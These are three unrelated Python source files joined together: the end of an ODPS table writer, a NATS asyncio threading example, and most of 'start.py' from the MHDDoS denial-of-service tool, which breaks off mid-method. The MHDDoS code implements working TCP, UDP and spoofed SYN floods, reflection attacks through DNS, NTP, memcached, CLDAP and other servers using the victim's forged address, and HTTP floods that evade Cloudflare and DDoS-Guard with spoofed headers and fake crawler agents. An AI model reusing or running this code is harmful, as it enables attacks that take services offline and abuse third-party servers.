project: Name of the ODPS project.
access_id: ODPS user access ID.
access_key: ODPS user access key.
endpoint: ODPS cluster endpoint.
table: ODPS table name.
            columns: The list of column names in the table,
                which will be inferred if the table exists.
            column_types: The list of column types in the table,
                which will be inferred if the table exists.
options: Other options passed to ODPS context.
"""
super(ODPSWriter, self).__init__()
if table.find(".") > 0:
project, table = table.split(".")
if options is None:
options = {}
self._project = project
self._access_id = access_id
self._access_key = access_key
self._endpoint = endpoint
self._table = table
self._columns = columns
self._column_types = column_types
self._odps_table = None
_configure_odps_options(self._endpoint, options)
self._odps_client = ODPS(
self._access_id, self._access_key, self._project, self._endpoint
)
def _initialize_table(self):
if self._odps_client.exist_table(self._table, self._project):
self._odps_table = self._odps_client.get_table(
self._table, self._project
)
else:
if self._columns is None or self._column_types is None:
raise ValueError(
"columns and column_types need to be "
"specified for non-existing table."
)
schema = Schema.from_lists(
self._columns, self._column_types, ["worker"], ["string"]
)
self._odps_table = self._odps_client.create_table(
self._table, schema
)
def from_iterator(self, records_iter, worker_index):
if self._odps_table is None:
self._initialize_table()
with self._odps_table.open_writer(
partition="worker=" + str(worker_index), create_partition=True
) as writer:
for records in records_iter:
writer.write(records)
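# Minimal usage sketch for ODPSWriter (illustrative only; the project,
# credentials, endpoint and table below are placeholders, not values defined
# in this module):
#
#   writer = ODPSWriter(
#       project="my_project",
#       access_id="<access-id>",
#       access_key="<access-key>",
#       endpoint="<odps-endpoint>",
#       table="results",
#       columns=["f0", "f1"],
#       column_types=["string", "string"],
#   )
#   # Each item yielded by the iterator is a batch of rows for writer.write().
#   writer.from_iterator(iter([[["a", "b"], ["c", "d"]]]), worker_index=0)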
|
coroutine_threadsafe.py
|
import asyncio
import time
import logging
from threading import Thread
from nats.aio.client import Client as NATS
from nats.aio.errors import ErrConnectionClosed, ErrTimeout
class Component:
component = None
def __init__(self):
self.nc = NATS()
self.loop = asyncio.new_event_loop()
if not Component.component:
Component.component = Component.__Component(self.nc, self.loop)
def run(self):
self.loop.run_until_complete(Component.component.run())
# Without this the ping interval will fail
self.loop.run_forever()
def publish(self, subject, data):
# Required to be able to run the coroutine in the proper thread.
asyncio.run_coroutine_threadsafe(
Component.component.publish(subject,data),
loop=self.loop)
def request(self, subject, data):
# Required to be able to run the coroutine in the proper thread.
future = asyncio.run_coroutine_threadsafe(
Component.component.request(subject, data),
loop=self.loop)
return future.result()
class __Component:
def __init__(self, nc, loop):
self.nc = nc
self.loop = loop
async def publish(self, subject, data):
await self.nc.publish(subject, data)
async def request(self, subject, data):
msg = await self.nc.request(subject, data)
return msg
async def msg_handler(self, msg):
print(f"--- Received: {msg.subject} {msg.data} {msg.reply}")
await self.nc.publish(msg.reply, b'I can help!')
async def run(self):
# It is very likely that the demo server will see traffic from clients other than yours.
# To avoid this, start your own locally and modify the example to use it.
# await self.nc.connect(servers=["nats://127.0.0.1:4222"], loop=self.loop)
await self.nc.connect(servers=["nats://demo.nats.io:4222"], loop=self.loop)
await self.nc.subscribe("help", cb=self.msg_handler)
await self.nc.flush()
def another_thread(c):
for i in range(0, 5):
print("Publishing...")
c.publish("help", b'hello world')
time.sleep(1)
msg = c.request("help", b'hi!')
print(msg)
def go():
# Create component and have it connect.
component = Component()
# Start the component loop in its own thread.
thr1 = Thread(target=component.run)
thr1.start()
# Another thread that will try to publish events
thr2 = Thread(target=another_thread, args=(component,))
thr2.start()
thr2.join()
if __name__ == '__main__':
go()
|
start.py
|
#!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from secrets import choice as randchoice
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run, PIPE
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get, cookies
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
RESET = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def exit(*message):
if message:
logger.error(bcolors.FAIL +" ".join(message) + bcolors.RESET)
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER", "KILLER"
}
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter:
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
    def randchr(length: int) -> str:
        return str(ProxyTools.Tools.rand_char(length)).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def dgb_solver(url, ua, pro=None):
s = None
idss = None
with Session() as s:
if pro:
s.proxies=pro
hdrs = {
"User-Agent": ua,
"Accept": "text/html",
"Accept-Language": "en-US",
"Connection": "keep-alive",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"TE": "trailers",
"DNT": "1"
}
with s.get(url, headers=hdrs) as ss:
for key, value in ss.cookies.items():
s.cookies.set_cookie(cookies.create_cookie(key, value))
hdrs = {
"User-Agent": ua,
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": url,
"Sec-Fetch-Dest": "script",
"Sec-Fetch-Mode": "no-cors",
"Sec-Fetch-Site": "cross-site"
}
with s.post("https://check.ddos-guard.net/check.js", headers=hdrs) as ss:
for key, value in ss.cookies.items():
if key == '__ddg2':
idss = value
s.cookies.set_cookie(cookies.create_cookie(key, value))
hdrs = {
"User-Agent": ua,
"Accept": "image/webp,*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Cache-Control": "no-cache",
"Referer": url,
"Sec-Fetch-Dest": "script",
"Sec-Fetch-Mode": "no-cors",
"Sec-Fetch-Site": "cross-site"
}
with s.get(f"{url}.well-known/ddos-guard/id/{idss}", headers=hdrs) as ss:
for key, value in ss.cookies.items():
s.cookies.set_cookie(cookies.create_cookie(key, value))
return s
return False
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.settimeout(.9)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00',
389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00',
53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(ProxyTools.Random.rand_int(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(ProxyTools.Random.rand_int(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
thread_id: int,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._thread_id = thread_id
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: keep-alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.settimeout(.9)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(ProxyTools.Random.rand_int(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def KILLER(self) -> None:
while True:
Thread(target=self.GET, daemon=True).start()
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
ts = time()
for _ in range(self._rpc):
Tools.send(s, payload)
if time() > ts + 120: break
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
with suppress(Exception):
if self._proxies:
pro = randchoice(self._proxies)
with Tools.dgb_solver(self._target.human_repr(),randchoice(self._useragents),pro.asRequest()) as ss:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
with ss.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
Tools.safe_close(ss)
with Tools.dgb_solver(self._target.human_repr(),randchoice(self._useragents)) as ss:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
with ss.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(ss)
def DYN(self):
payload: Any = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: Any = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
